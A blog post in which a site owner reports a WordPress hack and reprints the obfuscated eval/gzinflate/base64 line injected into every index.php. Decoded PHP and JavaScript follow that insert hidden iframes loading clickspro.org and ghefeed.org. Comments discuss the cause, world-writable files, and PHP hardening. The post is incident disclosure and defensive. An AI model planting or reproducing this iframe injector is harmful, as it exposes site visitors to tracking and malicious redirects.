The sorry state this page is in…

… is mostly due to the fact that it has been partially hacked. Unprotected visitors might have been tracked or redirected to malevolent sites.

I hope I have removed all hidden content and apologize for the inconvenience.

Every index.php was prefixed with the following code:

<!--?php eval(gzinflate(base64_decode('ADgGx/lpZiAoIWlzc2V0KCRmdGwpKXsgZ2xvYmFsICRmdGw7JGZ0bD0xOw0KCQllcnJvcl9yZXBvcnRpbmcoMCk7DQoJCWlmKCFwcmVnX21hdGNoKCcjYm90fHNwaWRlcnxjcmF3bHxzbHVycHx5YW5kZXgjaScsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpew0KCQlwcmludChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN0wwSFlCeEpsaVVtTDIzS2UzOUs5VXJYNEhTaENJQmdFeVRZa0VBUTdNR0l6ZWFTN0IxcFJ5TXBxeXFCeW1WV1pWMW1Ga0RNN1oyODk5NTc3NzMzM252dnZmZTZPNTFPSi9mZi96OWNabVFCYlBiT1N0ckpuaUdBcXNnZlAzNThIejhpSGpmVHVsaTFSNWVmZlhTWmZmVEpSK1ZIaDIxOS9Zdnp5VVdUMTVOUFBqbjhKZE9zbmM2M21tV2RYOVR2N3Z4aWZMdjFSZGJPUC9ub296dGJkL1RySDdTVHZMM3ppeGVmNFp2RC9QS3pxMkk1cTY2Kzl4R0J6RC82NVBMN2g3L2svUHl6ajg3cmFuRkNIODJ6anc2TDg2MmR2WjNQUHR0NXQ3dHo1L3o4azg4K3F2RlZOY3MvT2x4Kzl0SGUvVi80Qy9jKy9ZVy9jSGR2bC83WmZmZ0xmK0grd1MvOGhmY2Y0QS8rK0FDL1VhUGRlL3Y0RTcvdDRqTis2ZDY5WC9nTFA5M0RYenY0L0lGK2RIRGZObjFnbXNwdjNHSlAvem5nWHdCc2gxOUhCOERnSWI5NXozOFRDTjNuanhuMEEvMTQ5eDQrLzFRUjNpRlFuektRSGYxa24zN1pleWdqN0k5MDk1N3QxbzNybnI2TC96LzROSHg5ZDM5UDZLTWt3SnM4R3VDeXp4RHBIMEF3blhsRXNDUzlGNHpNMGVSVGZINlBTUTBNR1UxdWF3bEFnQjg4TUY4TmpZRHhFeHJ6bDUvS1MvZDU2UGlFWVhJRGpPM0J2aENOZStmdlpTN3RLT1VmUTNHWmJVTW9ic3R2TWpiU2l0dC9hcWFDbXpLKzRiQjV4QVlKN1JqbzhLaDRRTHZhRk5nLzJKSC8zM2Z6TkFBVHJUODlrSll5SmN3eFBFdU8rZ0NualQ1VlZFRWdwcDN0V045NmFENWo4RU52V2E0V2p0NHpnN2UwbDBGeGcxM3oyNjc5Yk05OWEyQTg0SThzS3doeGVhemNBZWJWU3FqTWlJVXJzOHYvR0JaamFMdjJuM3Z1UythNGUrWWZwampEdGRNbjlMNm52RUxOSDloWEJJSmhJLzBLdzMyZ1F4ZTIyck5RK3JPR0dRZG4zeitRdDMzeDJkM2Y3WHdnVVBZdEFLWnNmN1F5a1p1NjVjOVlkWENEbU53eTUvQmJhQ3R5LzFCK3dmRGtBeXZDSG5jTnlMYW9VVGVYVG4wYzNFWm5XaDI0Y1Z4R0cvSWNvdEduWmdENnlwNVJ2UHdQZjdsamdUSktBVjRNajRlMmEvN0JPUERScHp2NjFjOHp0V0k0bGJIanpvYUVYNzdrT1RNS1JCR3duKzI1YjVtQXdFcjcyU3o4TEdXM3gwTG9ZWWJqOVNpZEdLaTI3MXVxaXZmRndqSzRtSzg5MXlPMEIzNUdHTmRTeHIwdlgxcXV3VCszQVBTQkV1Q0V6OG42am54cFpPRlRENEVCUGhHZW9wY1AzTmo0U3pmYkVUcGI0YmZzRUxGT04ySHlRYTZKeUtLbElBdStsY1dJWThnRE9yQlR0K01raTdCNGFObkx2bW5wTEI4RGxpQ2w4OHFLZXVlQmpHcDM1NkZCaTBFK3RLOVlIREFFN3Q2SmtmU0Zmb3hLR2JBNkg0MmJWVm0wV3gvOXdsLzQwWjNEK1dkN2g4MW5IN0V6dmJoelh0VmJ4V2M3aDhYMnB6c1BmMWY4OHRudUo4V2RYL3oyc3dJTnhDVWZ6NnJwZXBFdjJ6dk5KNSs5YnV0aWVmRzk4L1B2YnkyL1YzeC9HeDc1SjhYdlByOXo1L0NYQlA1NWZyblYwR2VQNzJxNDhQOEVBQUQvL3c9PScpKSk7DQoJCX0NCn0NCgEAAP//')));?-->

This itself decodes into:

if (!isset($ftl))
{ 
  global $ftl;
  $ftl=1;
  error_reporting(0);
  print('</pre><iframe '
        'style="visibility: hidden; position: absolute; left: 0; top: 0;"'
        'src="nohttp://click.clickspro.org/feed/frames.php?uid=56&'
        'frames=3" width="10" height="10">');
}

And the second infection decodes into:

if (document.getElementsByTagName('body')[0])
{
  iframer();
} else {
  document.write('</pre>'
    '<iframe style="visibility: hidden; position: absolute; left: 0; top: 0;" '
    'src="nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3' 
    'width="10" height="10"></iframe></pre>');
}
function iframer()
{
  var f = document.createElement('iframe');
  f.setAttribute('src','nohttp://ghefeed.org/feed/frames.php?uid=56&amp;frames=3');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

Fortunately, the attack ended here and did not succeed to do any more damage. Keeping debian and wordpress up to date appears to have shielded against anything serious.

Lessons learned: clickspro.org is a junkpit, ghefeed.org too.

About

A coder that is slightly older than 'the giant leap for all mankind'.

Posted in Uncategorized
2 comments on “The sorry state this page is in…
  1. J. says:

    I got hacked by this too(“only” 30 wordpress installations) but I am still concerned about one thing: how did it write itself to all index.php files on several sites which did not have wordpress? It is resident within PHP?

    In my case, the eval’ed code was written. So somewhere else in your system there must be an exploit which did this.

    Did you figure out what caused it?

  2. herd says:

    You probably did the same (beginners) mistake as me:
    Taking php security for granted.

    After I was hacked, I found out that all my content was writable by user www-data, which is how the infection took place. An old theme, turning akismet off for a while opened the inherent security holes. Then, the code wrote itself to all php-files but neither the server security nor anything else than the php-files themselves got compromised. After all, I wasn’t the target, my visitors were.

    After some googling about hardened php, I found some interesting suggestions that I put into good measure, like exactly limiting which URLs can have their php files executed and closing cross-site scripting gaps and so on. Now I even can have eval and gzinflate enabled (wordpress won’t work without it) and still be safe until the next exploit happens.

1 Pings/Trackbacks for "The sorry state this page is in…"
  1. […] demasiada información al respecto,  indagando un poco se encuentran referencias a esta amenaza (aquí y aquí ). Se especula sobre una posible puerta trasera que facilitaría la reinyeccion […]

Leave a Reply

Your email address will not be published. Required fields are marked *

*